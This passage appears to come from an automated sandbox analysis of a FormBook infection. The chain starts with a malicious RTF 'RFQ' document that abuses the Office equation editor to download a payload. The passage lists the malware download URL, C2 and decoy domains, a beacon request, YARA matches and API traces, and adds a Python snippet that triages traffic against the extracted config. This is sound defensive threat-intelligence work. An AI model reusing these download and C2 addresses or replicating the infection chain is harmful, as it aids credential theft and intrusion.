Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmp
Source: unknown DNS traffic detected: queries for: sanbarts.com
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404FDD
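The configuration extracted in the AV Detection section lists one C2 entry (www.rthearts.com/nk6l/) and 64 decoy domains, and the traffic above shows that same /nk6l/ path being requested from www.createacarepack.com, which is in the decoy list, while explorer.exe also resolves www.paypal-caseid521.com and www.storyofsol.com from that list. Host alone therefore does not identify the real C2; the path does. The following is an added example, not the report's or FormBook's code, of folding the extracted config into traffic triage: it classifies each request by path and host against the config and parses the beacon query, whose first value is plain standard base64 rather than URL-encoded. The decoy list is abridged to six entries, two of the four requests (to www.rthearts.com and www.example.org) are hypothetical and constructed to exercise the other branches, and the function names are the example's own.

```python
"""Classify observed HTTP requests against the FormBook configuration the
sandbox extracted. Added example; the requests are constructed from values in
this report plus two hypothetical ones."""
import base64
import binascii

# From the extracted configuration; decoy list abridged to six of the 64 entries.
CONFIG = {
    "C2 list": ["www.rthearts.com/nk6l/"],
    "decoy": ["cbnextra.com", "paypal-caseid521.com", "storyofsol.com",
              "createacarepack.com", "hotyachts.net", "427521.com"],
}

REQUESTS = [
    # observed in the report: the C2 path requested from a decoy domain
    {"host": "www.createacarepack.com",
     "uri": "/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi"},
    # hypothetical: the same beacon shape reaching the configured C2 host
    {"host": "www.rthearts.com", "uri": "/nk6l/?m6A=AAAA&lJE=gtqHRlRHi"},
    # observed in the report: the stage-two download, not a FormBook beacon
    {"host": "sanbarts.com", "uri": "/cssati.exe"},
    # hypothetical: the C2 path sent to a host that is in neither list
    {"host": "www.example.org", "uri": "/nk6l/?m6A=AAAA&lJE=x"},
]


def strip_www(host):
    h = host.lower()
    return h[4:] if h.startswith("www.") else h


def parse_config(cfg):
    """Split 'host/path/' C2 entries into (host, path) and normalise decoys."""
    c2 = []
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2.append((strip_www(host), "/" + path))
    return c2, {strip_www(d) for d in cfg["decoy"]}


def parse_beacon_query(query):
    """The beacon query is '<key>=<blob>&<key>=<id>'. The blob is raw base64
    ('+', '/' and '=' are not URL-encoded), so split by hand instead of using
    parse_qs, which would turn '+' into a space and break the decode."""
    params = [tuple(kv.partition("=")[::2]) for kv in query.split("&") if kv]
    payload_len = None
    if params:
        try:
            payload_len = len(base64.b64decode(params[0][1], validate=True))
        except (binascii.Error, ValueError):
            payload_len = None          # not base64: probably not a beacon
    return params, payload_len


def classify(request, cfg=CONFIG):
    c2, decoys = parse_config(cfg)
    host = strip_www(request["host"])
    path, _, query = request["uri"].partition("?")
    if path not in {p for _, p in c2}:
        return {"verdict": "not a FormBook beacon", "host": host}
    params, payload_len = parse_beacon_query(query)
    if host in {h for h, _ in c2}:
        verdict = "beacon to configured C2"
    elif host in decoys:
        verdict = "beacon to decoy domain"
    else:
        verdict = "beacon path to host outside config"
    return {"verdict": verdict, "host": host,
            "params": [k for k, _ in params], "payload_bytes": payload_len}


def classify_all(requests=REQUESTS, cfg=CONFIG):
    return [classify(r, cfg) for r in requests]


if __name__ == "__main__":
    for result in classify_all():
        print(result)
```

When blocking, use the C2 path together with the host list rather than the host alone: the decoy requests are noise the malware generates on purpose, and a block list built only from observed hosts would miss www.rthearts.com, which never appeared in this capture.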

E-Banking Fraud

Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: initial sample Static file information: Filename: Revised RFQ-PO180911.doc
Source: Revised RFQ-PO180911.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe
Source: Revised RFQ-PO180911.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004032FA
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: String function: 009B2233 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: String function: 00A0DF5C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: String function: 00A53F92 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: String function: 00A5373B appears 87 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: String function: 009AF1E0 appears 48 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01FDF970 appears 81 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01F6DF5C appears 107 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01F6E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01FB373B appears 238 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01FB3F92 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A350 NtCreateFile, 6_2_0041A350
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A400 NtReadFile, 6_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A480 NtClose, 6_2_0041A480
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A530 NtAllocateVirtualMemory, 6_2_0041A530
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A34A NtCreateFile, 6_2_0041A34A
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A3FB NtReadFile, 6_2_0041A3FB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041A47B NtClose, 6_2_0041A47B
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk, 6_2_00A000C4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk, 6_2_00A00078
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00A00048
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FF9F0 NtClose,LdrInitializeThunk, 6_2_009FF9F0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FF900 NtReadFile,LdrInitializeThunk, 6_2_009FF900
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_009FFAD0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_009FFAE8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_009FFBB8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_009FFB68
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_009FFC90
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_009FFC60
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk, 6_2_009FFD8C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_009FFDC0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_009FFEA0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_009FFED0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk, 6_2_009FFFB4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A010D0 NtOpenProcessToken, 6_2_00A010D0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A00060 NtQuerySection, 6_2_00A00060
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A001D4 NtSetValueKey, 6_2_00A001D4
